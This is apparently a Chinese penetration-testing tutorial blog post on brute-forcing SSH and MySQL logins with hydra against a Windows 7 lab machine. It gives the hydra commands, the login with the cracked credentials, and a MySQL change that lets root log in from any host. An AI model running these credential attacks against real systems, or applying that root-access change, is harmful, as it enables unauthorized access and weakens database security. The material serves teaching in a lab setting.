暴力破解之hydra
前言
一、什么是暴力破解
暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息。攻击者会经常使用自动化脚本组合出正确的用户名和密码。
二、暴力破解枚举之hydra
1.hydra相关语法
kali自带的hydra
hydra -l root -p root 172.26.2.36 ssh
-l 指定用户名
-L 指定用户名字典
-p 指定密码
-P 指定密码字典
-C 使用冒号分隔,root:root
-M 指定目标列表文件
-f 在找到第一队登录名和密码时停止
2.利用hydra进行爆破获取用户信息
打开window7靶机的mysql
这里我自定义爆破字典进行爆破
自定义用户ok.txt,密码字典cmd.txt
在kali中打开hydra输入
hydra -L cmd.txt -P ok.txt 192.168.222.97 mysql -f
爆破win7的数据库用户名和密码
用vim ok.txt进行编译即可
爆破成功,出现用户名和密码,进行登录连接数据库
输入mysql -h 192.168.222.109 -u 账号 -p 密码
登录成功,可以利用数据库查询得到可利用的信息。
这里可能会出现hydra连接不上win7的mysql,解决方法如下,打开数据库进行修改一些配置信息
(1)利用kali中的hydra连接外机的数据库时,有时连接不的解决方法是:
改表法。可能是你的帐号不允许从远程登陆,只能在localhost。这个时候只要在localhost的那台电脑,登入mysql后,更改 “mysql” 数据库里的 “user” 表里的 “host” 项,从"localhost"改称"%"
mysql -u root -pvmwaremysql>use mysql;
mysql>update user set host = ‘%’ where user = ‘root’;
mysql>select host, user from user;
flush privileges;文章来源:https://www.toymoban.com/news/detail-483189.html
总结
本次实验简单介绍了暴力破解工具hydra的简单使用,学会对hydra关键语句的使用,利用语句和字典对数据库,ssh进行爆破获取用户信息。文章来源地址https://www.toymoban.com/news/detail-483189.html
到了这里,关于渗透测试-暴力破解之hydra的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![[渗透测试]—2.3 密码破解技术](https://imgs.yssmx.com/Uploads/2024/02/501347-1.jpg)
![[渗透测试]—7.4 逆向工程和二进制破解技术](https://imgs.yssmx.com/Uploads/2024/02/515003-1.jpg)
